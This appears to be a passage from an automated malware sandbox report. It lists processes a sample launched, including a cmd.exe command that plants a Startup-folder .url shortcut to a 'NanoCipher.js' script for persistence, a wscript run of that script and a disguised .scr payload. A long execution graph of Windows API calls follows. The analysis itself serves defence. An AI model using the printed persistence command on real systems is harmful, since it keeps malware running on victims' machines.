                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.url" & echo URL="C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.url" & exit
                                                    Imagebase:0x1c0000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:14
                                                    Start time:09:37:41
                                                    Start date:31/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff66e660000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:16
                                                    Start time:09:37:54
                                                    Start date:31/10/2024
                                                    Path:C:\Windows\System32\wscript.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.js"
                                                    Imagebase:0x7ff7b2ef0000
                                                    File size:170'496 bytes
                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:17
                                                    Start time:09:37:54
                                                    Start date:31/10/2024
                                                    Path:C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr" "C:\Users\user\AppData\Local\NanoSec Cryptographics\o"
                                                    Imagebase:0x700000
                                                    File size:893'608 bytes
                                                    MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 5%, ReversingLabs
                                                    Has exited:false

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:17%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:20.6%
                                                      Total number of Nodes:1524
                                                      Total number of Limit Nodes:36
                                                      execution_graph 4340 402fc0 4341 401446 18 API calls 4340->4341 4342 402fc7 4341->4342 4343 403017 4342->4343 4344 40300a 4342->4344 4347 401a13 4342->4347 4345 406805 18 API calls 4343->4345 4346 401446 18 API calls 4344->4346 4345->4347 4346->4347 4348 4023c1 4349 40145c 18 API calls 4348->4349 4350 4023c8 4349->4350 4353 40726a 4350->4353 4356 406ed2 CreateFileW 4353->4356 4357 406f04 4356->4357 4358 406f1e ReadFile 4356->4358 4359 4062a3 11 API calls 4357->4359 4360 4023d6 4358->4360 4363 406f84 4358->4363 4359->4360 4361 4071e3 CloseHandle 4361->4360 4362 406f9b ReadFile lstrcpynA lstrcmpA 4362->4363 4364 406fe2 SetFilePointer ReadFile 4362->4364 4363->4360 4363->4361 4363->4362 4367 406fdd 4363->4367 4364->4361 4365 4070a8 ReadFile 4364->4365 4366 407138 4365->4366 4366->4365 4366->4367 4368 40715f SetFilePointer GlobalAlloc ReadFile 4366->4368 4367->4361 4369 4071a3 4368->4369 4370 4071bf lstrcpynW GlobalFree 4368->4370 4369->4369 4369->4370 4370->4361 4371 401cc3 4372 40145c 18 API calls 4371->4372 4373 401cca lstrlenW 4372->4373 4374 4030dc 4373->4374 4375 4030e3 4374->4375 4377 405f51 wsprintfW 4374->4377 4377->4375 4392 401c46 4393 40145c 18 API calls 4392->4393 4394 401c4c 4393->4394 4395 4062a3 11 API calls 4394->4395 4396 401c59 4395->4396 4397 406c9b 81 API calls 4396->4397 4398 401c64 4397->4398 4399 403049 4400 401446 18 API calls 4399->4400 4403 403050 4400->4403 4401 406805 18 API calls 4402 401a13 4401->4402 4403->4401 4403->4402 4404 40204a 4405 401446 18 API calls 4404->4405 4406 402051 IsWindow 4405->4406 4407 4018d3 4406->4407 4408 40324c 4409 403277 4408->4409 4410 40325e SetTimer 4408->4410 4411 4032cc 4409->4411 4412 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4409->4412 4410->4409 4412->4411 4413 4048cc 4414 4048f1 4413->4414 4415 4048da 4413->4415 4417 4048ff IsWindowVisible 4414->4417 4421 404916 4414->4421 4416 4048e0 4415->4416 4431 40495a 4415->4431 4418 403daf SendMessageW 4416->4418 4420 40490c 4417->4420 4417->4431 4422 4048ea 4418->4422 4419 404960 CallWindowProcW 4419->4422 4432 40484e SendMessageW 4420->4432 4421->4419 4437 406009 lstrcpynW 4421->4437 4425 404945 4438 405f51 wsprintfW 4425->4438 4427 40494c 4428 40141d 80 API calls 4427->4428 4429 404953 4428->4429 4439 406009 lstrcpynW 4429->4439 4431->4419 4433 404871 GetMessagePos ScreenToClient SendMessageW 4432->4433 4434 4048ab SendMessageW 4432->4434 4435 4048a3 4433->4435 4436 4048a8 4433->4436 4434->4435 4435->4421 4436->4434 4437->4425 4438->4427 4439->4431 4440 4022cc 4441 40145c 18 API calls 4440->4441 4442 4022d3 4441->4442 4443 4062d5 2 API calls 4442->4443 4444 4022d9 4443->4444 4445 4022e8 4444->4445 4449 405f51 wsprintfW 4444->4449 4448 4030e3 4445->4448 4450 405f51 wsprintfW 4445->4450 4449->4445 4450->4448 4219 4050cd 4220 405295 4219->4220 4221 4050ee GetDlgItem GetDlgItem GetDlgItem 4219->4221 4222 4052c6 4220->4222 4223 40529e GetDlgItem CreateThread CloseHandle 4220->4223 4269 403d98 SendMessageW 4221->4269 4225 4052f4 4222->4225 4227 4052e0 ShowWindow ShowWindow 4222->4227 4228 405316 4222->4228 4223->4222 4272 405047 83 API calls 4223->4272 4229 405352 4225->4229 4230 4052fd 4225->4230 4226 405162 4240 406805 18 API calls 4226->4240 4271 403d98 SendMessageW 4227->4271 4234 403dca 8 API calls 4228->4234 4229->4228 4235 40535d SendMessageW 4229->4235 4232 405305 4230->4232 4233 40532b ShowWindow 4230->4233 4236 403d18 SendMessageW 4232->4236 4238 40534b 4233->4238 4239 40533d 4233->4239 4237 40528e 4234->4237 4235->4237 4242 405376 CreatePopupMenu 4235->4242 4236->4228 4241 403d18 SendMessageW 4238->4241 4243 404f72 25 API calls 4239->4243 4244 405181 4240->4244 4241->4229 4245 406805 18 API calls 4242->4245 4243->4238 4246 4062a3 11 API calls 4244->4246 4248 405386 AppendMenuW 4245->4248 4247 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4246->4247 4249 4051f3 4247->4249 4250 4051d7 SendMessageW SendMessageW 4247->4250 4251 405399 GetWindowRect 4248->4251 4252 4053ac 4248->4252 4253 405206 4249->4253 4254 4051f8 SendMessageW 4249->4254 4250->4249 4255 4053b3 TrackPopupMenu 4251->4255 4252->4255 4256 403d3f 19 API calls 4253->4256 4254->4253 4255->4237 4257 4053d1 4255->4257 4258 405216 4256->4258 4259 4053ed SendMessageW 4257->4259 4260 405253 GetDlgItem SendMessageW 4258->4260 4261 40521f ShowWindow 4258->4261 4259->4259 4262 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4259->4262 4260->4237 4265 405276 SendMessageW SendMessageW 4260->4265 4263 405242 4261->4263 4264 405235 ShowWindow 4261->4264 4266 40542f SendMessageW 4262->4266 4270 403d98 SendMessageW 4263->4270 4264->4263 4265->4237 4266->4266 4267 40545a GlobalUnlock SetClipboardData CloseClipboard 4266->4267 4267->4237 4269->4226 4270->4260 4271->4225 4451 4030cf 4452 40145c 18 API calls 4451->4452 4453 4030d6 4452->4453 4455 4030dc 4453->4455 4458 4063ac GlobalAlloc lstrlenW 4453->4458 4456 4030e3 4455->4456 4485 405f51 wsprintfW 4455->4485 4459 4063e2 4458->4459 4460 406434 4458->4460 4461 40640f GetVersionExW 4459->4461 4486 40602b CharUpperW 4459->4486 4460->4455 4461->4460 4462 40643e 4461->4462 4463 406464 LoadLibraryA 4462->4463 4464 40644d 4462->4464 4463->4460 4467 406482 GetProcAddress GetProcAddress GetProcAddress 4463->4467 4464->4460 4466 406585 GlobalFree 4464->4466 4468 40659b LoadLibraryA 4466->4468 4469 4066dd FreeLibrary 4466->4469 4472 4064aa 4467->4472 4475 4065f5 4467->4475 4468->4460 4471 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4468->4471 4469->4460 4470 406651 FreeLibrary 4479 40662a 4470->4479 4471->4475 4473 4064ce FreeLibrary GlobalFree 4472->4473 4472->4475 4481 4064ea 4472->4481 4473->4460 4474 4066ea 4477 4066ef CloseHandle FreeLibrary 4474->4477 4475->4470 4475->4479 4476 4064fc lstrcpyW OpenProcess 4478 40654f CloseHandle CharUpperW lstrcmpW 4476->4478 4476->4481 4480 406704 CloseHandle 4477->4480 4478->4475 4478->4481 4479->4474 4482 406685 lstrcmpW 4479->4482 4483 4066b6 CloseHandle 4479->4483 4484 4066d4 CloseHandle 4479->4484 4480->4477 4481->4466 4481->4476 4481->4478 4482->4479 4482->4480 4483->4479 4484->4469 4485->4456 4486->4459 4487 407752 4491 407344 4487->4491 4488 407c6d 4489 4073c2 GlobalFree 4490 4073cb GlobalAlloc 4489->4490 4490->4488 4490->4491 4491->4488 4491->4489 4491->4490 4491->4491 4492 407443 GlobalAlloc 4491->4492 4493 40743a GlobalFree 4491->4493 4492->4488 4492->4491 4493->4492 4494 401dd3 4495 401446 18 API calls 4494->4495 4496 401dda 4495->4496 4497 401446 18 API calls 4496->4497 4498 4018d3 4497->4498 4506 402e55 4507 40145c 18 API calls 4506->4507 4508 402e63 4507->4508 4509 402e79 4508->4509 4510 40145c 18 API calls 4508->4510 4511 405e30 2 API calls 4509->4511 4510->4509 4512 402e7f 4511->4512 4536 405e50 GetFileAttributesW CreateFileW 4512->4536 4514 402e8c 4515 402f35 4514->4515 4516 402e98 GlobalAlloc 4514->4516 4519 4062a3 11 API calls 4515->4519 4517 402eb1 4516->4517 4518 402f2c CloseHandle 4516->4518 4537 403368 SetFilePointer 4517->4537 4518->4515 4521 402f45 4519->4521 4523 402f50 DeleteFileW 4521->4523 4524 402f63 4521->4524 4522 402eb7 4526 403336 ReadFile 4522->4526 4523->4524 4538 401435 4524->4538 4527 402ec0 GlobalAlloc 4526->4527 4528 402ed0 4527->4528 4529 402f04 WriteFile GlobalFree 4527->4529 4530 40337f 37 API calls 4528->4530 4531 40337f 37 API calls 4529->4531 4535 402edd 4530->4535 4532 402f29 4531->4532 4532->4518 4534 402efb GlobalFree 4534->4529 4535->4534 4536->4514 4537->4522 4539 404f72 25 API calls 4538->4539 4540 401443 4539->4540 4541 401cd5 4542 401446 18 API calls 4541->4542 4543 401cdd 4542->4543 4544 401446 18 API calls 4543->4544 4545 401ce8 4544->4545 4546 40145c 18 API calls 4545->4546 4547 401cf1 4546->4547 4548 401d07 lstrlenW 4547->4548 4549 401d43 4547->4549 4550 401d11 4548->4550 4550->4549 4554 406009 lstrcpynW 4550->4554 4552 401d2c 4552->4549 4553 401d39 lstrlenW 4552->4553 4553->4549 4554->4552 4555 403cd6 4556 403ce1 4555->4556 4557 403ce5 4556->4557 4558 403ce8 GlobalAlloc 4556->4558 4558->4557 4559 402cd7 4560 401446 18 API calls 4559->4560 4563 402c64 4560->4563 4561 402d99 4562 402d17 ReadFile 4562->4563 4563->4559 4563->4561 4563->4562 4564 402dd8 4565 402ddf 4564->4565 4566 4030e3 4564->4566 4567 402de5 FindClose 4565->4567 4567->4566 4568 401d5c 4569 40145c 18 API calls 4568->4569 4570 401d63 4569->4570 4571 40145c 18 API calls 4570->4571 4572 401d6c 4571->4572 4573 401d73 lstrcmpiW 4572->4573 4574 401d86 lstrcmpW 4572->4574 4575 401d79 4573->4575 4574->4575 4576 401c99 4574->4576 4575->4574 4575->4576 4278 407c5f 4279 407344 4278->4279 4280 4073c2 GlobalFree 4279->4280 4281 4073cb GlobalAlloc 4279->4281 4282 407c6d 4279->4282 4283 407443 GlobalAlloc 4279->4283 4284 40743a GlobalFree 4279->4284 4280->4281 4281->4279 4281->4282 4283->4279 4283->4282 4284->4283 4577 404363 4578 404373 4577->4578 4579 40439c 4577->4579 4581 403d3f 19 API calls 4578->4581 4580 403dca 8 API calls 4579->4580 4582 4043a8 4580->4582 4583 404380 SetDlgItemTextW 4581->4583 4583->4579 4584 4027e3 4585 4027e9 4584->4585 4586 4027f2 4585->4586 4587 402836 4585->4587 4600 401553 4586->4600 4588 40145c 18 API calls 4587->4588 4590 40283d 4588->4590 4592 4062a3 11 API calls 4590->4592 4591 4027f9 4593 40145c 18 API calls 4591->4593 4598 401a13 4591->4598 4594 40284d 4592->4594 4595 40280a RegDeleteValueW 4593->4595 4604 40149d RegOpenKeyExW 4594->4604 4596 4062a3 11 API calls 4595->4596 4599 40282a RegCloseKey 4596->4599 4599->4598 4601 401563 4600->4601 4602 40145c 18 API calls 4601->4602 4603 401589 RegOpenKeyExW 4602->4603 4603->4591 4610 401515 4604->4610 4612 4014c9 4604->4612 4605 4014ef RegEnumKeyW 4606 401501 RegCloseKey 4605->4606 4605->4612 4607 4062fc 3 API calls 4606->4607 4609 401511 4607->4609 4608 401526 RegCloseKey 4608->4610 4609->4610 4613 401541 RegDeleteKeyW 4609->4613 4610->4598 4611 40149d 3 API calls 4611->4612 4612->4605 4612->4606 4612->4608 4612->4611 4613->4610 4614 403f64 4615 403f90 4614->4615 4616 403f74 4614->4616 4618 403fc3 4615->4618 4619 403f96 SHGetPathFromIDListW 4615->4619 4625 405c84 GetDlgItemTextW 4616->4625 4621 403fad SendMessageW 4619->4621 4622 403fa6 4619->4622 4620 403f81 SendMessageW 4620->4615 4621->4618 4623 40141d 80 API calls 4622->4623 4623->4621 4625->4620 4626 402ae4 4627 402aeb 4626->4627 4628 4030e3 4626->4628 4629 402af2 CloseHandle 4627->4629 4629->4628 4630 402065 4631 401446 18 API calls 4630->4631 4632 40206d 4631->4632 4633 401446 18 API calls 4632->4633 4634 402076 GetDlgItem 4633->4634 4635 4030dc 4634->4635 4636 4030e3 4635->4636 4638 405f51 wsprintfW 4635->4638 4638->4636 4639 402665 4640 40145c 18 API calls 4639->4640 4641 40266b 4640->4641 4642 40145c 18 API calls 4641->4642 4643 402674 4642->4643 4644 40145c 18 API calls 4643->4644 4645 40267d 4644->4645 4646 4062a3 11 API calls 4645->4646 4647 40268c 4646->4647 4648 4062d5 2 API calls 4647->4648 4649 402695 4648->4649 4650 4026a6 lstrlenW lstrlenW 4649->4650 4651 404f72 25 API calls 4649->4651 4654 4030e3 4649->4654 4652 404f72 25 API calls 4650->4652 4651->4649 4653 4026e8 SHFileOperationW 4652->4653 4653->4649 4653->4654 4662 401c69 4663 40145c 18 API calls 4662->4663 4664 401c70 4663->4664 4665 4062a3 11 API calls 4664->4665 4666 401c80 4665->4666 4667 405ca0 MessageBoxIndirectW 4666->4667 4668 401a13 4667->4668 4676 402f6e 4677 402f72 4676->4677 4678 402fae 4676->4678 4679 4062a3 11 API calls 4677->4679 4680 40145c 18 API calls 4678->4680 4681 402f7d 4679->4681 4686 402f9d 4680->4686 4682 4062a3 11 API calls 4681->4682 4683 402f90 4682->4683 4684 402fa2 4683->4684 4685 402f98 4683->4685 4688 4060e7 9 API calls 4684->4688 4687 403e74 5 API calls 4685->4687 4687->4686 4688->4686 4689 4023f0 4690 402403 4689->4690 4691 4024da 4689->4691 4692 40145c 18 API calls 4690->4692 4693 404f72 25 API calls 4691->4693 4694 40240a 4692->4694 4699 4024f1 4693->4699 4695 40145c 18 API calls 4694->4695 4696 402413 4695->4696 4697 402429 LoadLibraryExW 4696->4697 4698 40241b GetModuleHandleW 4696->4698 4700 40243e 4697->4700 4701 4024ce 4697->4701 4698->4697 4698->4700 4713 406365 GlobalAlloc WideCharToMultiByte 4700->4713 4702 404f72 25 API calls 4701->4702 4702->4691 4704 402449 4705 40248c 4704->4705 4706 40244f 4704->4706 4707 404f72 25 API calls 4705->4707 4709 401435 25 API calls 4706->4709 4711 40245f 4706->4711 4708 402496 4707->4708 4710 4062a3 11 API calls 4708->4710 4709->4711 4710->4711 4711->4699 4712 4024c0 FreeLibrary 4711->4712 4712->4699 4714 406390 GetProcAddress 4713->4714 4715 40639d GlobalFree 4713->4715 4714->4715 4715->4704 4716 402df3 4717 402dfa 4716->4717 4719 4019ec 4716->4719 4718 402e07 FindNextFileW 4717->4718 4718->4719 4720 402e16 4718->4720 4722 406009 lstrcpynW 4720->4722 4722->4719 4074 402175 4075 401446 18 API calls 4074->4075 4076 40217c 4075->4076 4077 401446 18 API calls 4076->4077 4078 402186 4077->4078 4079 4062a3 11 API calls 4078->4079 4083 402197 4078->4083 4079->4083 4080 4021aa EnableWindow 4082 4030e3 4080->4082 4081 40219f ShowWindow 4081->4082 4083->4080 4083->4081 4730 404077 4731 404081 4730->4731 4732 404084 lstrcpynW lstrlenW 4730->4732 4731->4732 4100 405479 4101 405491 4100->4101 4102 4055cd 4100->4102 4101->4102 4103 40549d 4101->4103 4104 40561e 4102->4104 4105 4055de GetDlgItem GetDlgItem 4102->4105 4106 4054a8 SetWindowPos 4103->4106 4107 4054bb 4103->4107 4109 405678 4104->4109 4117 40139d 80 API calls 4104->4117 4108 403d3f 19 API calls 4105->4108 4106->4107 4111 4054c0 ShowWindow 4107->4111 4112 4054d8 4107->4112 4113 405608 SetClassLongW 4108->4113 4110 403daf SendMessageW 4109->4110 4130 4055c8 4109->4130 4140 40568a 4110->4140 4111->4112 4114 4054e0 DestroyWindow 4112->4114 4115 4054fa 4112->4115 4116 40141d 80 API calls 4113->4116 4169 4058dc 4114->4169 4118 405510 4115->4118 4119 4054ff SetWindowLongW 4115->4119 4116->4104 4120 405650 4117->4120 4123 4055b9 4118->4123 4124 40551c GetDlgItem 4118->4124 4119->4130 4120->4109 4125 405654 SendMessageW 4120->4125 4121 40141d 80 API calls 4121->4140 4122 4058de DestroyWindow EndDialog 4122->4169 4179 403dca 4123->4179 4128 40554c 4124->4128 4129 40552f SendMessageW IsWindowEnabled 4124->4129 4125->4130 4127 40590d ShowWindow 4127->4130 4132 405559 4128->4132 4133 4055a0 SendMessageW 4128->4133 4134 40556c 4128->4134 4143 405551 4128->4143 4129->4128 4129->4130 4131 406805 18 API calls 4131->4140 4132->4133 4132->4143 4133->4123 4137 405574 4134->4137 4138 405589 4134->4138 4136 403d3f 19 API calls 4136->4140 4141 40141d 80 API calls 4137->4141 4142 40141d 80 API calls 4138->4142 4139 405587 4139->4123 4140->4121 4140->4122 4140->4130 4140->4131 4140->4136 4160 40581e DestroyWindow 4140->4160 4170 403d3f 4140->4170 4141->4143 4144 405590 4142->4144 4176 403d18 4143->4176 4144->4123 4144->4143 4146 405705 GetDlgItem 4147 405723 ShowWindow KiUserCallbackDispatcher 4146->4147 4148 40571a 4146->4148 4173 403d85 KiUserCallbackDispatcher 4147->4173 4148->4147 4150 40574d EnableWindow 4153 405761 4150->4153 4151 405766 GetSystemMenu EnableMenuItem SendMessageW 4152 405796 SendMessageW 4151->4152 4151->4153 4152->4153 4153->4151 4174 403d98 SendMessageW 4153->4174 4175 406009 lstrcpynW 4153->4175 4156 4057c4 lstrlenW 4157 406805 18 API calls 4156->4157 4158 4057da SetWindowTextW 4157->4158 4159 40139d 80 API calls 4158->4159 4159->4140 4161 405838 CreateDialogParamW 4160->4161 4160->4169 4162 40586b 4161->4162 4161->4169 4163 403d3f 19 API calls 4162->4163 4164 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4163->4164 4165 40139d 80 API calls 4164->4165 4166 4058bc 4165->4166 4166->4130 4167 4058c4 ShowWindow 4166->4167 4168 403daf SendMessageW 4167->4168 4168->4169 4169->4127 4169->4130 4171 406805 18 API calls 4170->4171 4172 403d4a SetDlgItemTextW 4171->4172 4172->4146 4173->4150 4174->4153 4175->4156 4177 403d25 SendMessageW 4176->4177 4178 403d1f 4176->4178 4177->4139 4178->4177 4180 403ddf GetWindowLongW 4179->4180 4190 403e68 4179->4190 4181 403df0 4180->4181 4180->4190 4182 403e02 4181->4182 4183 403dff GetSysColor 4181->4183 4184 403e12 SetBkMode 4182->4184 4185 403e08 SetTextColor 4182->4185 4183->4182 4186 403e30 4184->4186 4187 403e2a GetSysColor 4184->4187 4185->4184 4188 403e41 4186->4188 4189 403e37 SetBkColor 4186->4189 4187->4186 4188->4190 4191 403e54 DeleteObject 4188->4191 4192 403e5b CreateBrushIndirect 4188->4192 4189->4188 4190->4130 4191->4192 4192->4190 4733 4020f9 GetDC GetDeviceCaps 4734 401446 18 API calls 4733->4734 4735 402116 MulDiv 4734->4735 4736 401446 18 API calls 4735->4736 4737 40212c 4736->4737 4738 406805 18 API calls 4737->4738 4739 402165 CreateFontIndirectW 4738->4739 4740 4030dc 4739->4740 4741 4030e3 4740->4741 4743 405f51 wsprintfW 4740->4743 4743->4741 4744 4024fb 4745 40145c 18 API calls 4744->4745 4746 402502 4745->4746 4747 40145c 18 API calls 4746->4747 4748 40250c 4747->4748 4749 40145c 18 API calls 4748->4749 4750 402515 4749->4750 4751 40145c 18 API calls 4750->4751 4752 40251f 4751->4752 4753 40145c 18 API calls 4752->4753 4754 402529 4753->4754 4755 40253d 4754->4755 4756 40145c 18 API calls 4754->4756 4757 4062a3 11 API calls 4755->4757 4756->4755 4758 40256a CoCreateInstance 4757->4758 4759 40258c 4758->4759 4760 40497c GetDlgItem GetDlgItem 4761 4049d2 7 API calls 4760->4761 4766 404bea 4760->4766 4762 404a76 DeleteObject 4761->4762 4763 404a6a SendMessageW 4761->4763 4764 404a81 4762->4764 4763->4762 4767 404ab8 4764->4767 4769 406805 18 API calls 4764->4769 4765 404ccf 4768 404d74 4765->4768 4773 404bdd 4765->4773 4778 404d1e SendMessageW 4765->4778 4766->4765 4776 40484e 5 API calls 4766->4776 4789 404c5a 4766->4789 4772 403d3f 19 API calls 4767->4772 4770 404d89 4768->4770 4771 404d7d SendMessageW 4768->4771 4775 404a9a SendMessageW SendMessageW 4769->4775 4780 404da2 4770->4780 4781 404d9b ImageList_Destroy 4770->4781 4791 404db2 4770->4791 4771->4770 4777 404acc 4772->4777 4779 403dca 8 API calls 4773->4779 4774 404cc1 SendMessageW 4774->4765 4775->4764 4776->4789 4782 403d3f 19 API calls 4777->4782 4778->4773 4784 404d33 SendMessageW 4778->4784 4785 404f6b 4779->4785 4786 404dab GlobalFree 4780->4786 4780->4791 4781->4780 4787 404add 4782->4787 4783 404f1c 4783->4773 4792 404f31 ShowWindow GetDlgItem ShowWindow 4783->4792 4788 404d46 4784->4788 4786->4791 4790 404baa GetWindowLongW SetWindowLongW 4787->4790 4799 404ba4 4787->4799 4802 404b39 SendMessageW 4787->4802 4803 404b67 SendMessageW 4787->4803 4804 404b7b SendMessageW 4787->4804 4798 404d57 SendMessageW 4788->4798 4789->4765 4789->4774 4793 404bc4 4790->4793 4791->4783 4794 404de4 4791->4794 4797 40141d 80 API calls 4791->4797 4792->4773 4795 404be2 4793->4795 4796 404bca ShowWindow 4793->4796 4807 404e12 SendMessageW 4794->4807 4810 404e28 4794->4810 4812 403d98 SendMessageW 4795->4812 4811 403d98 SendMessageW 4796->4811 4797->4794 4798->4768 4799->4790 4799->4793 4802->4787 4803->4787 4804->4787 4805 404ef3 InvalidateRect 4805->4783 4806 404f09 4805->4806 4813 4043ad 4806->4813 4807->4810 4809 404ea1 SendMessageW SendMessageW 4809->4810 4810->4805 4810->4809 4811->4773 4812->4766 4814 4043cd 4813->4814 4815 406805 18 API calls 4814->4815 4816 40440d 4815->4816 4817 406805 18 API calls 4816->4817 4818 404418 4817->4818 4819 406805 18 API calls 4818->4819 4820 404428 lstrlenW wsprintfW SetDlgItemTextW 4819->4820 4820->4783 4821 4026fc 4822 401ee4 4821->4822 4824 402708 4821->4824 4822->4821 4823 406805 18 API calls 4822->4823 4823->4822 4273 4019fd 4274 40145c 18 API calls 4273->4274 4275 401a04 4274->4275 4276 405e7f 2 API calls 4275->4276 4277 401a0b 4276->4277 4825 4022fd 4826 40145c 18 API calls 4825->4826 4827 402304 GetFileVersionInfoSizeW 4826->4827 4828 40232b GlobalAlloc 4827->4828 4832 4030e3 4827->4832 4829 40233f GetFileVersionInfoW 4828->4829 4828->4832 4830 402350 VerQueryValueW 4829->4830 4831 402381 GlobalFree 4829->4831 4830->4831 4834 402369 4830->4834 4831->4832 4838 405f51 wsprintfW 4834->4838 4836 402375 4839 405f51 wsprintfW 4836->4839 4838->4836 4839->4831 4840 402afd 4841 40145c 18 API calls 4840->4841 4842 402b04 4841->4842 4847 405e50 GetFileAttributesW CreateFileW 4842->4847 4844 402b10 4845 4030e3 4844->4845 4848 405f51 wsprintfW 4844->4848 4847->4844 4848->4845 4849 4029ff 4850 401553 19 API calls 4849->4850 4851 402a09 4850->4851 4852 40145c 18 API calls 4851->4852 4853 402a12 4852->4853 4854 402a1f RegQueryValueExW 4853->4854 4856 401a13 4853->4856 4855 402a3f 4854->4855 4859 402a45 4854->4859 4855->4859 4860 405f51 wsprintfW 4855->4860 4858 4029e4 RegCloseKey 4858->4856 4859->4856 4859->4858 4860->4859 4861 401000 4862 401037 BeginPaint GetClientRect 4861->4862 4863 40100c DefWindowProcW 4861->4863 4865 4010fc 4862->4865 4866 401182 4863->4866 4867 401073 CreateBrushIndirect FillRect DeleteObject 4865->4867 4868 401105 4865->4868 4867->4865 4869 401170 EndPaint 4868->4869 4870 40110b CreateFontIndirectW 4868->4870 4869->4866 4870->4869 4871 40111b 6 API calls 4870->4871 4871->4869 4872 401f80 4873 401446 18 API calls 4872->4873 4874 401f88 4873->4874 4875 401446 18 API calls 4874->4875 4876 401f93 4875->4876 4877 401fa3 4876->4877 4878 40145c 18 API calls 4876->4878 4879 401fb3 4877->4879 4880 40145c 18 API calls 4877->4880 4878->4877 4881 402006 4879->4881 4882 401fbc 4879->4882 4880->4879 4884 40145c 18 API calls 4881->4884 4883 401446 18 API calls 4882->4883 4886 401fc4 4883->4886 4885 40200d 4884->4885 4887 40145c 18 API calls 4885->4887 4888 401446 18 API calls 4886->4888 4889 402016 FindWindowExW 4887->4889 4890 401fce 4888->4890 4894 402036 4889->4894 4891 401ff6 SendMessageW 4890->4891 4892 401fd8 SendMessageTimeoutW 4890->4892 4891->4894 4892->4894 4893 4030e3 4894->4893 4896 405f51 wsprintfW 4894->4896 4896->4893 4897 402880 4898 402884 4897->4898 4899 40145c 18 API calls 4898->4899 4900 4028a7 4899->4900 4901 40145c 18 API calls 4900->4901 4902 4028b1 4901->4902 4903 4028ba RegCreateKeyExW 4902->4903 4904 4028e8 4903->4904 4911 4029ef 4903->4911 4905 402934 4904->4905 4906 40145c 18 API calls 4904->4906 4907 402963 4905->4907 4910 401446 18 API calls 4905->4910 4909 4028fc lstrlenW 4906->4909 4908 4029ae RegSetValueExW 4907->4908 4912 40337f 37 API calls 4907->4912 4915 4029c6 RegCloseKey 4908->4915 4916 4029cb 4908->4916 4913 402918 4909->4913 4914 40292a 4909->4914 4917 402947 4910->4917 4918 40297b 4912->4918 4919 4062a3 11 API calls 4913->4919 4920 4062a3 11 API calls 4914->4920 4915->4911 4921 4062a3 11 API calls 4916->4921 4922 4062a3 11 API calls 4917->4922 4928 406224 4918->4928 4924 402922 4919->4924 4920->4905 4921->4915 4922->4907 4924->4908 4927 4062a3 11 API calls 4927->4924 4929 406247 4928->4929 4930 40628a 4929->4930 4931 40625c wsprintfW 4929->4931 4932 402991 4930->4932 4933 406293 lstrcatW 4930->4933 4931->4930 4931->4931 4932->4927 4933->4932 4934 402082 4935 401446 18 API calls 4934->4935 4936 402093 SetWindowLongW 4935->4936 4937 4030e3 4936->4937 3462 403883 #17 SetErrorMode OleInitialize 3535 4062fc GetModuleHandleA 3462->3535 3466 4038f1 GetCommandLineW 3540 406009 lstrcpynW 3466->3540 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3541 405d06 3469->3541 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3545 4037cc 3473->3545 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3553 403587 GetTickCount GetModuleFileNameW 3476->3553 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3668 403859 3483->3668 3485->3472 3485->3478 3493 4039d8 3485->3493 3581 40592c 3486->3581 3499 403a5e 3487->3499 3490 403ac1 3655 4060e7 3490->3655 3491 403ae1 3675 405ca0 3491->3675 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3638 406009 lstrcpynW 3493->3638 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3639 40677e 3503->3639 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3680 406009 lstrcpynW 3509->3680 3679 406009 lstrcpynW 3510->3679 3515 403bef 3511->3515 3514 403b44 3681 406009 lstrcpynW 3514->3681 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 